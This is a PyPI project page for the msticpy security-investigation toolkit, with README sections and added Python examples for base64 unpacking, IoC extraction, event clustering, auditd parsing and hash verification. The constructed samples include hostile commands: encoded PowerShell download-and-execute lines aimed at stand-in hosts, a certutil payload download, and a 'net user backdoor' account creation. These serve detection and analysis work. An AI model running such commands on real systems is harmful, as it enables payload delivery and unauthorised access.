
MSTIC Security Tools

Project description

License: MIT

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the “Software”), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

# MSTIC Jupyter and Python Security Tools

Microsoft Threat Intelligence Python Security Tools.

The msticpy package was initially developed to support Jupyter Notebook authoring for [Azure Sentinel](https://azure.microsoft.com/en-us/services/azure-sentinel/). However, many of the components can be used in other security scenarios for threat hunting and threat investigation. There are three main sub-packages:

  • sectools - python security tools to help with data analysis or investigation

  • nbtools - Jupyter-specific UI tools such as widgets and data display

  • data - data interfaces specific to Sentinel/Log Analytics

The package is in an early preview mode, so there are likely to be bugs, and several components are not yet optimized for performance. We welcome feedback, bug reports and suggestions for new features.

## Installing

```bash
pip install msticpy
```

or for the latest dev build

```bash
pip install git+https://github.com/microsoft/msticpy
```

## Documentation

The public functions, classes and public class methods have docstrings that describe the parameters and, for more complex functions give a more detailed description of functionality and outputs. We are in the process of producing more formal documentation on read-the-docs.

Until then, the functionality is described in the following sections and accompanying notebooks. You can also browse through the sample notebooks (especially the Windows Alert Investigation notebook) to see some of the functionality used in context.

## Security Tools Sub-package - sectools

This subpackage contains several modules helpful for working on security investigations and hunting:

### base64unpack

Base64 and archive (gz, zip, tar) extractor. Input can be either a single string or a specified column of a pandas DataFrame. It tries to identify any base64-encoded strings and decode them. If the result looks like one of the supported archive types it unpacks the contents. The results of each decode/unpack are rechecked for further base64 content, recursing up to 20 levels deep (the default can be overridden). Output is a decoded string (for single-string input) or a DataFrame (for DataFrame input).

[Base64Unpack Notebook](./doc/Base64Unpack.ipynb)
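The following is an added illustration of the recursive decode-and-unpack approach described above. It is not msticpy's code and does not use its API: the function names, the 16-character minimum match length, the 90%-printable text heuristic and the 10 MB decompression cap are this example's own choices, and the encoded PowerShell launcher it runs on is constructed for the example rather than taken from real telemetry.

```python
"""Recursive base64 / archive unpacker: an added example, not msticpy's own code."""
import base64
import binascii
import gzip
import io
import re
import tarfile
import zipfile
import zlib

# Runs of base64 alphabet at least 16 chars long, with optional '=' padding. The
# lookarounds stop us matching the tail of a longer run. (Threshold is this
# example's choice: short ordinary words would otherwise decode to garbage.)
_B64_RE = re.compile(r"(?<![A-Za-z0-9+/=])([A-Za-z0-9+/]{16,}={0,2})(?![A-Za-z0-9+/=])")
_MAX_UNPACKED = 10 * 1024 * 1024  # decompression-bomb guard per archive member


def _looks_like_text(raw: bytes) -> bool:
    """Heuristic: at least 90% printable ASCII or whitespace. A 16-character word
    that happens to be valid base64 decodes to high-entropy bytes and fails this."""
    if not raw:
        return False
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in raw)
    return printable / len(raw) >= 0.9


def _unpack_archive(data: bytes):
    """Return (kind, [(member_name, content), ...]) for gz/zip/tar payloads, else None."""
    try:
        if data[:2] == b"\x1f\x8b":  # gzip magic
            with gzip.GzipFile(fileobj=io.BytesIO(data)) as gz:
                content = gz.read(_MAX_UNPACKED + 1)
            members = [("gz-content", content)] if len(content) <= _MAX_UNPACKED else []
            return "gz", members
        if data[:4] == b"PK\x03\x04":  # zip local file header
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                return "zip", [(i.filename, zf.read(i)) for i in zf.infolist()
                               if not i.is_dir() and i.file_size <= _MAX_UNPACKED]
        if len(data) > 262 and data[257:262] == b"ustar":  # tar magic at offset 257
            with tarfile.open(fileobj=io.BytesIO(data)) as tf:
                return "tar", [(m.name, tf.extractfile(m).read()) for m in tf.getmembers()
                               if m.isfile() and m.size <= _MAX_UNPACKED]
    except (OSError, EOFError, zlib.error, zipfile.BadZipFile, tarfile.TarError):
        return None  # magic bytes matched by chance; not a usable archive
    return None


def unpack(text: str, max_depth: int = 20, _depth: int = 0) -> list:
    """Find, decode and recursively unpack base64 in `text`.

    Returns one dict per decoded item: {"depth", "archive", "member", "decoded"}.
    """
    findings = []
    if _depth >= max_depth:
        return findings
    for match in _B64_RE.finditer(text):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
        except (binascii.Error, ValueError):
            continue  # wrong length or padding: an ordinary word, not base64
        archive = _unpack_archive(raw)
        kind = archive[0] if archive else None
        items = archive[1] if archive else [(None, raw)]
        for member, content in items:
            is_text = _looks_like_text(content)
            if archive is None and not is_text:
                continue  # plain decode that is not text: almost certainly a false match
            decoded = content.decode("utf-8", errors="replace")
            findings.append({"depth": _depth, "archive": kind, "member": member, "decoded": decoded})
            if is_text:  # encoded commands are routinely nested: re-scan the result
                findings.extend(unpack(decoded, max_depth, _depth + 1))
    return findings


# --- constructed sample (not real telemetry): gzip+base64 launcher wrapping a second base64 layer ---
INNER_COMMAND = "Invoke-WebRequest http://203.0.113.10/payload.bin -OutFile C:\\Users\\Public\\p.bin"
_INNER_B64 = base64.b64encode(INNER_COMMAND.encode()).decode()
OUTER_SCRIPT = f"$c = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('{_INNER_B64}')); iex $c"
_GZ_B64 = base64.b64encode(gzip.compress(OUTER_SCRIPT.encode())).decode()
SAMPLE_CMDLINE = f"powershell.exe -nop -w hidden -e {_GZ_B64}"

if __name__ == "__main__":
    for item in unpack(SAMPLE_CMDLINE):
        print(f"depth={item['depth']} archive={item['archive']}: {item['decoded'][:70]}")
```

Running this on `SAMPLE_CMDLINE` yields two findings: the gzip member at depth 0 (the outer script) and the inner `Invoke-WebRequest` command at depth 1. `FromBase64String` in the outer script is itself a valid 16-character base64 token, which is exactly why the printable-text check matters; the DataFrame form described above is the same per-cell operation applied to a column.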

### iocextract

Uses a set of builtin regular expressions to look for Indicator of Compromise (IoC) patterns. Input can be a single string or a pandas dataframe with one or more columns specified as input.

The following types are built-in:

  • IPv4 and IPv6

  • URL

  • DNS domain

  • Hashes (MD5, SHA1, SHA256)

  • Windows file paths

  • Linux file paths (noisy, because a legal Linux file path can contain almost any character)

You can modify or add to the regular expressions used at runtime.

Output is a dictionary of matches (for single string input) or a DataFrame (for dataframe input).

[IoCExtract Notebook](./doc/IoCExtract.ipynb)
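An added example of the regex-driven extraction described above, written for this page and not taken from msticpy's iocextract module. The pattern set, the `_NOT_TLD` filter that stops file extensions being reported as domains, and the row-oriented `extract_iocs_from_records` (a stand-in for the DataFrame input, so the example runs without pandas) are this example's own; the three command lines are constructed, and the SHA256 value is the well-known digest of the empty string.

```python
"""Regex IoC extraction over strings and row records: an added example, not msticpy's iocextract."""
import re

_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
IOC_PATTERNS = {
    # Octet-checked dotted quad; lookarounds reject longer dotted numbers such as build versions.
    "ipv4": re.compile(r"(?<![\d.])(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)(?![\d.])"),
    # Uncompressed IPv6 only; "::" shorthand would need a second pattern.
    "ipv6": re.compile(r"(?<![:\w])(?:[0-9a-f]{1,4}:){7}[0-9a-f]{1,4}(?![:\w])", re.I),
    "url": re.compile(r"\b(?:https?|ftp)://[^\s'\"<>]+", re.I),
    "dns": re.compile(r"\b(?:" + _LABEL + r"\.)+[a-z]{2,63}\b", re.I),
    "md5": re.compile(r"\b[a-f0-9]{32}\b", re.I),
    "sha1": re.compile(r"\b[a-f0-9]{40}\b", re.I),
    "sha256": re.compile(r"\b[a-f0-9]{64}\b", re.I),
    # Drive-letter paths without spaces; quoted "Program Files" paths need a separate pattern.
    "windows_path": re.compile(r"\b[a-z]:\\(?:[^\\/:*?\"<>|\s]+\\)*[^\\/:*?\"<>|\s]*", re.I),
}
# File extensions the DNS regex would otherwise report as top-level domains (example's own list).
_NOT_TLD = {"exe", "dll", "ps1", "bin", "txt", "log", "zip", "bat", "vbs", "dat", "tmp", "js"}


def extract_iocs(text: str, ioc_types=None) -> dict:
    """Return {ioc_type: sorted unique matches} for one string; types absent from text are omitted."""
    results = {}
    for name in ioc_types or IOC_PATTERNS:
        found = {m.group(0) for m in IOC_PATTERNS[name].finditer(text)}
        if name == "dns":
            found = {d for d in found if d.rsplit(".", 1)[-1].lower() not in _NOT_TLD}
        if found:
            results[name] = sorted(found)
    return results


def extract_iocs_from_records(records, columns) -> list:
    """Row-oriented analogue of DataFrame input: one output row per (record, column, observable)."""
    out = []
    for idx, rec in enumerate(records):
        for col in columns:
            for ioc_type, values in extract_iocs(str(rec.get(col, ""))).items():
                for value in values:
                    out.append({"row": idx, "column": col, "ioc_type": ioc_type, "observable": value})
    return out


# --- constructed sample events (not real telemetry) ---
SAMPLE_EVENTS = [
    {"Host": "wks01",
     "CommandLine": "powershell.exe -c \"IEX (New-Object Net.WebClient).DownloadString('http://malware.example.net/a.ps1')\""},
    {"Host": "wks02",
     "CommandLine": "certutil -urlcache -f http://198.51.100.23:8080/x.exe C:\\Users\\Public\\x.exe"},
    {"Host": "wks03",
     "CommandLine": "regsvr32 /s C:\\Temp\\drop.dll",
     "FileHash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},
]

if __name__ == "__main__":
    for row in extract_iocs_from_records(SAMPLE_EVENTS, ["CommandLine", "FileHash"]):
        print(row)
```

Note the noise the README warns about: on the first event the DNS pattern reports `Net.WebClient` alongside `malware.example.net`, because anything shaped like `label.letters` is a syntactically valid hostname. Tightening that usually means post-filtering against a TLD list or resolving candidates, rather than a cleverer regex.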

### vtlookup

Wrapper class around the [VirusTotal API](https://www.virustotal.com/en/documentation/public-api/). Input can be a single IoC observable or a pandas DataFrame containing multiple observables. Processing requires a VirusTotal account and API key, and throughput is limited by the requests-per-minute quota of your account type. Bear in mind that every lookup discloses the observable to VirusTotal. Supported IoC types:

  • Filehash

  • URL

  • DNS Domain

  • IPv4 Address

[VTLookup Notebook](./doc/VirusTotalLookup.ipynb)

### geoip

Geographic location lookup for IP addresses. This module has two classes for different services:

  • MaxMind GeoLite2 - a downloadable database, so lookups run locally

  • IPStack - an online lookup service (API key required)

Both services offer a free tier for non-commercial use. However, a paid tier will normally get you more accuracy, more detail and a higher throughput rate. Because IPStack is an online service, each lookup sends the IP address you are investigating to a third party; the MaxMind database keeps lookups local.

[GeoIP Lookup Notebook](./doc/GeoIPLookups.ipynb)

### eventcluster

This module is intended to be used to summarize large numbers of events into clusters of different patterns. High volume repeating events can often make it difficult to see unique and interesting items.

The module contains functions to generate clusterable features from string data. For example, an administration command that does some maintenance on thousands of servers with a command line such as `install-update -hostname {host.fqdn} -tmp:/tmp/{GUID}/rollback`

can be collapsed into a single cluster pattern by ignoring the character values in the string and using delimiters or tokens to group the values.

This is an unsupervised learning module implemented using the scikit-learn DBSCAN algorithm.
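To make the collapsing idea concrete, here is an added example (not msticpy's eventcluster code) that derives two value-agnostic features from each command line, token count and delimiter count, and clusters them with a minimal hand-written DBSCAN so that it runs without scikit-learn. The feature choice, the delimiter set, `eps=1.5` and `min_samples=3` are this example's own; the maintenance commands and the two one-off commands are constructed, with GUIDs generated by `uuid5` so the sample is deterministic.

```python
"""Delimiter/token features plus a minimal DBSCAN for grouping command lines.
Added example; not msticpy's eventcluster implementation."""
import math
import re
import uuid

DELIMITERS = set("-/\\:.,;=|&<>(){}[]'\"@")


def token_pattern(cmdline: str) -> str:
    """Collapse every alphanumeric run to 'X' so only delimiters and spacing remain."""
    return re.sub(r"\s+", " ", re.sub(r"[A-Za-z0-9]+", "X", cmdline)).strip()


def features(cmdline: str):
    """Numeric features that ignore character values: (token count, delimiter count)."""
    return (float(len(cmdline.split())), float(sum(ch in DELIMITERS for ch in cmdline)))


def dbscan(points, eps, min_samples):
    """Minimal DBSCAN (Euclidean distance). Returns one label per point; -1 marks noise."""
    n = len(points)
    labels = [None] * n

    def neighbours(i):
        return [j for j in range(n) if math.dist(points[i], points[j]) <= eps]

    cluster = 0
    for i in range(n):
        if labels[i] is not None:
            continue
        nbrs = neighbours(i)
        if len(nbrs) < min_samples:
            labels[i] = -1          # provisional noise; may become a border point later
            continue
        labels[i] = cluster
        seeds = [j for j in nbrs if j != i]
        while seeds:
            j = seeds.pop()
            if labels[j] == -1:
                labels[j] = cluster  # border point: joins the cluster, does not expand it
            if labels[j] is not None:
                continue
            labels[j] = cluster
            j_nbrs = neighbours(j)
            if len(j_nbrs) >= min_samples:  # core point: keep expanding
                seeds.extend(k for k in j_nbrs if labels[k] is None)
        cluster += 1
    return labels


def cluster_commands(cmdlines, eps=1.5, min_samples=3):
    """Cluster command lines; returns (labels, {label: {"count", "example", "pattern"}})."""
    labels = dbscan([features(c) for c in cmdlines], eps, min_samples)
    summary = {}
    for cmd, label in zip(cmdlines, labels):
        entry = summary.setdefault(label, {"count": 0, "example": cmd, "pattern": token_pattern(cmd)})
        entry["count"] += 1
    return labels, summary


# --- constructed sample: routine maintenance on six hosts plus two one-off commands ---
_HOSTS = ["srv01.contoso.com", "srv02.contoso.com", "web-03.contoso.com",
          "db07.corp.local", "app11.corp.local", "dc01.corp.local"]
SAMPLE_COMMANDS = [
    f"install-update -hostname {host} -tmp:/tmp/{uuid.uuid5(uuid.NAMESPACE_DNS, host)}/rollback"
    for host in _HOSTS
] + [
    "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    "cmd.exe /c net user backdoor Passw0rd /add",
]

if __name__ == "__main__":
    _, summary = cluster_commands(SAMPLE_COMMANDS)
    for label, info in sorted(summary.items()):
        print(f"cluster {label:>2}: {info['count']} events  e.g. {info['example'][:60]}")
```

The six maintenance commands land in one cluster and the two unusual commands are labelled noise (-1), which is the signal a hunter wants. Notice that `token_pattern` alone would split `web-03.contoso.com` from the other hosts because of its extra hyphen; the numeric features with an `eps` tolerance absorb that difference, which is why a density-based clusterer is used rather than exact pattern matching.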

### outliers

Similar to the eventcluster module but a little more experimental (read: less tested). It uses the scikit-learn Isolation Forest to identify outlier events, either within a single data set or by fitting on one data set and predicting outliers in another.

### auditdextract

Module to load and decode Linux audit logs. It collapses messages sharing the same message ID into single events, decodes hex-encoded data fields and performs some event-specific formatting and normalization (e.g. for process start events it re-assembles the process command line arguments into a single string). This is still a work in progress.
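An added example of the three steps just described (collapse by message ID, hex-decode, rebuild the command line), written for this page rather than taken from msticpy's auditdextract. The parser relies only on the standard auditd record format (`type=... msg=audit(timestamp:serial): key=value ...`, with string fields that contain spaces or special characters emitted as unquoted hex and `proctitle` arguments separated by NUL bytes). Which fields are treated as hex-encodable per record type, and the output field names, are this example's own choices; the log lines are constructed. Fragmented EXECVE arguments (`a2[0]`, `a2[1]`) are not reassembled here.

```python
"""Collapse, hex-decode and normalize Linux auditd records. Added example, not msticpy's code."""
import re
import shlex
from collections import OrderedDict

# Optional "node=" prefix appears when records are forwarded by audisp-remote.
_HEADER = re.compile(r"^(?:node=\S+ )?type=(?P<type>\S+) msg=audit\((?P<ts>\d+\.\d+):(?P<serial>\d+)\):\s*(?P<body>.*)$")
# key=value pairs: value is either a double-quoted string or a bare token.
_KV = re.compile(r'([A-Za-z_][\w\[\]]*)=("(?:[^"\\]|\\.)*"|\S*)')
_HEX = re.compile(r"(?:[0-9A-Fa-f]{2})+")
# Fields that auditd hex-encodes when they contain unsafe characters. Register values such as
# SYSCALL a0..a3 are hex *numbers* and must not be decoded, hence the per-type mapping.
_HEX_STRING_FIELDS = {
    "EXECVE": re.compile(r"a\d+"),
    "PROCTITLE": re.compile(r"proctitle"),
    "CWD": re.compile(r"cwd"),
    "PATH": re.compile(r"name"),
    "SYSCALL": re.compile(r"comm|exe|key"),
}


def parse_line(line: str):
    """Parse one auditd line into {"type", "timestamp", "serial", "fields"}; None if not an audit record."""
    m = _HEADER.match(line.strip())
    if not m:
        return None
    rec_type = m["type"]
    hex_fields = _HEX_STRING_FIELDS.get(rec_type)
    fields = {}
    for key, raw in _KV.findall(m["body"]):
        if len(raw) >= 2 and raw.startswith('"') and raw.endswith('"'):
            fields[key] = raw[1:-1]
        elif hex_fields and hex_fields.fullmatch(key) and _HEX.fullmatch(raw):
            fields[key] = bytes.fromhex(raw).decode("utf-8", errors="replace")
        else:
            fields[key] = raw
    return {"type": rec_type, "timestamp": float(m["ts"]), "serial": int(m["serial"]), "fields": fields}


def _normalize(event: dict) -> dict:
    """Event-specific reshaping: rebuild the EXECVE command line, split proctitle, lift SYSCALL basics."""
    records = event["records"]
    if "EXECVE" in records:
        args = []
        for fields in records["EXECVE"]:
            for key, value in fields.items():
                am = re.fullmatch(r"a(\d+)", key)
                if am:
                    args.append((int(am.group(1)), value))
        # shlex.quote keeps arguments containing spaces unambiguous in the single string
        event["cmdline"] = " ".join(shlex.quote(v) for _, v in sorted(args))
    if "PROCTITLE" in records:
        event["proctitle"] = records["PROCTITLE"][0].get("proctitle", "").split("\x00")
    if "SYSCALL" in records:
        sc = records["SYSCALL"][0]
        event["exe"] = sc.get("exe")
        event["pid"] = int(sc["pid"]) if sc.get("pid", "").isdigit() else None
    return event


def collapse_events(lines) -> list:
    """Group records by (timestamp, serial) into one event each, preserving first-seen order."""
    events = OrderedDict()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        key = (rec["timestamp"], rec["serial"])
        ev = events.setdefault(key, {"timestamp": rec["timestamp"], "serial": rec["serial"], "records": {}})
        ev["records"].setdefault(rec["type"], []).append(rec["fields"])
    return [_normalize(ev) for ev in events.values()]


# --- constructed sample: two execve events whose records arrive interleaved ---
SAMPLE_AUDIT_LINES = [
    'type=SYSCALL msg=audit(1553083200.123:4567): arch=c000003e syscall=59 success=yes exit=0 a0=55d8c0e0 a1=55d8c1f0 a2=55d8c2a0 a3=7ffc1a2b items=2 ppid=1234 pid=1235 auid=1000 uid=1000 gid=1000 euid=1000 tty=pts0 ses=3 comm="curl" exe="/usr/bin/curl" key="exec"',
    'type=SYSCALL msg=audit(1553083201.456:4568): arch=c000003e syscall=59 success=yes exit=0 a0=55d8c3b0 a1=55d8c4c0 a2=55d8c5d0 a3=7ffc1a2b items=2 ppid=1234 pid=1236 auid=1000 uid=1000 gid=1000 euid=1000 tty=pts0 ses=3 comm="id" exe="/usr/bin/id" key="exec"',
    'type=EXECVE msg=audit(1553083200.123:4567): argc=3 a0="curl" a1="-o" a2=2F746D702F6D79207061796C6F61642E7368',
    'type=CWD msg=audit(1553083200.123:4567): cwd="/home/alice"',
    'type=PROCTITLE msg=audit(1553083200.123:4567): proctitle=6375726C002D6F002F746D702F6D79207061796C6F61642E7368',
    'type=EXECVE msg=audit(1553083201.456:4568): argc=1 a0="id"',
    'type=PROCTITLE msg=audit(1553083201.456:4568): proctitle="id"',
]

if __name__ == "__main__":
    for ev in collapse_events(SAMPLE_AUDIT_LINES):
        print(ev["serial"], ev.get("exe"), ev.get("cmdline"))
```

The third argument of the first event, `a2=2F74...`, is hex because the path contains a space; after decoding, the rebuilt command line is `curl -o '/tmp/my payload.sh'`. The SYSCALL record's `a0=55d8c0e0` is left untouched even though it is valid hex, because there it is a register value, not a string.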

## Notebook tools sub-package - nbtools

This is a collection of display and utility modules designed to make working with security data in Jupyter notebooks quicker and easier.

  • nbwidgets - groups common functionality such as list pickers, time boundary settings, saving and retrieving environment variables into a single line callable command.

  • nbdisplay - functions that implement common display of things like alerts, events in a slightly more consumable way than print()

  • entityschema - implements entity classes (e.g. Host, Account, IPAddress) used in Log Analytics alerts and in many of these modules. Each entity encapsulates one or more properties related to the entity.

[Notebooks Tools](./doc/NotebookWidgets.ipynb)

## Data sub-package - data

These components are currently still part of the nbtools sub-package but will be refactored to separate them into their own package.

  • query manager - collection of modules that implement common KQL/Log Analytics queries using KqlMagic

  • security_alert and security_event - encapsulation classes for alerts and events. Each has a standard ‘entities’ property reflecting the entities found in the alert or event. These can also be used as meta-parameters for many of the queries. For example, the query `qry.list_host_logons(provs=[query_times, alert])` extracts the value for the hostname query parameter from the alert.

## Clone the notebooks in this repo to Azure Notebooks

Requires sign-in to Azure Notebooks: [Import msticpy into Azure Notebooks](https://notebooks.azure.com/import/gh/Microsoft/msticpy)

## More Notebook Examples

See the following notebooks for more examples of the use of this package in practice:

## To-Do Items

## Supported Platforms and Packages

  • msticpy is OS-independent

  • Requires Python 3.6 or later

  • Requires the following python packages: pandas, bokeh, matplotlib, seaborn, setuptools, urllib3, ipywidgets, numpy, attrs, requests, networkx, ipython, scikit_learn, typing

  • The following packages are recommended and needed for some specific functionality: Kqlmagic, maxminddb_geolite2, folium, dnspython, ipwhois

See [requirements.txt](requirements.txt) for more details and version requirements.

## Contributing

This project welcomes contributions and suggestions. Most contributions require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us the rights to use your contribution. For details, visit <https://cla.microsoft.com>.

When you submit a pull request, a CLA-bot will automatically determine whether you need to provide a CLA and decorate the PR appropriately (e.g., label, comment). Simply follow the instructions provided by the bot. You will only need to do this once across all repos using our CLA.

This project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/). For more information see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) or contact [opencode@microsoft.com](mailto:opencode@microsoft.com) with any additional questions or comments.


Project details

Release history

This version: 0.1.5

Download files

  • Source Distribution: msticpy-0.1.5.tar.gz (89.0 kB)

  • Built Distribution: msticpy-0.1.5-py3-none-any.whl (105.4 kB)

File details: msticpy-0.1.5.tar.gz

  • Download URL: msticpy-0.1.5.tar.gz
  • Size: 89.0 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/1.13.0 pkginfo/1.5.0.1 requests/2.21.0 setuptools/40.6.2 requests-toolbelt/0.9.1 tqdm/4.31.1 CPython/3.6.8

Hashes for msticpy-0.1.5.tar.gz

| Algorithm | Hash digest |
| --- | --- |
| SHA256 | 20a1a72aaea4eeeacb59083aab27381355fb56ccec10e2b20dba15d43700585c |
| MD5 | c69bde953616ddc6a9732e27625eff86 |
| BLAKE2b-256 | 5f782bdd8ae3fec900fc8828b7d73c419536c6b816ae23fc3a3377359f8976c1 |

File details: msticpy-0.1.5-py3-none-any.whl

  • Download URL: msticpy-0.1.5-py3-none-any.whl
  • Size: 105.4 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/1.13.0 pkginfo/1.5.0.1 requests/2.21.0 setuptools/40.6.2 requests-toolbelt/0.9.1 tqdm/4.31.1 CPython/3.6.8

Hashes for msticpy-0.1.5-py3-none-any.whl

| Algorithm | Hash digest |
| --- | --- |
| SHA256 | 3db619dd730035e9df9a3bbc9d44c9ffe1d9eac38a9259c402de687eb480f83e |
| MD5 | c676fe63d83621eaea263d111e42036c |
| BLAKE2b-256 | 00159ae4832ef963d2100eba8a638cdbb82949c6fa424231bd82bc0a62d835d9 |
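Neither release was uploaded with Trusted Publishing, so the published digests are the only integrity check available for these two artifacts. The following added example (not part of the package or the PyPI page) shows how to verify a downloaded file against them and how to turn them into a hash-pinned requirement line for `pip install --require-hashes`. The SHA256 and BLAKE2b-256 values are the ones listed above; MD5 is deliberately left out because it no longer resists collision attacks. The file contents used in the test are a constructed stand-in, not the real archive.

```python
"""Verify a downloaded distribution against its published PyPI digests. Added example."""
import hashlib
import hmac

# Digests as published on PyPI for msticpy 0.1.5 (copied from the release page).
PUBLISHED = {
    "msticpy-0.1.5.tar.gz": {
        "sha256": "20a1a72aaea4eeeacb59083aab27381355fb56ccec10e2b20dba15d43700585c",
        "blake2b_256": "5f782bdd8ae3fec900fc8828b7d73c419536c6b816ae23fc3a3377359f8976c1",
    },
    "msticpy-0.1.5-py3-none-any.whl": {
        "sha256": "3db619dd730035e9df9a3bbc9d44c9ffe1d9eac38a9259c402de687eb480f83e",
        "blake2b_256": "00159ae4832ef963d2100eba8a638cdbb82949c6fa424231bd82bc0a62d835d9",
    },
}


def digests(data: bytes) -> dict:
    """Compute the two digests PyPI publishes; BLAKE2b-256 is blake2b with a 32-byte digest."""
    return {
        "sha256": hashlib.sha256(data).hexdigest(),
        "blake2b_256": hashlib.blake2b(data, digest_size=32).hexdigest(),
    }


def verify(filename: str, data: bytes, published=PUBLISHED) -> bool:
    """True only if every published digest for `filename` matches `data` (constant-time compare)."""
    if filename not in published:
        raise ValueError(f"no published digests for {filename}")
    actual = digests(data)
    expected = published[filename]
    return all(hmac.compare_digest(actual[alg], expected[alg]) for alg in expected)


def hash_pinned_requirement(name_version: str, published=PUBLISHED) -> str:
    """requirements.txt line for `pip install --require-hashes`: one --hash per acceptable artifact."""
    hashes = " ".join(f"--hash=sha256:{entry['sha256']}" for entry in published.values())
    return f"{name_version} {hashes}"


if __name__ == "__main__":
    print(hash_pinned_requirement("msticpy==0.1.5"))
```

With `--require-hashes`, pip refuses any artifact whose SHA256 is not on the line, including a later re-upload of the same version, which is the property you want from a pin.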
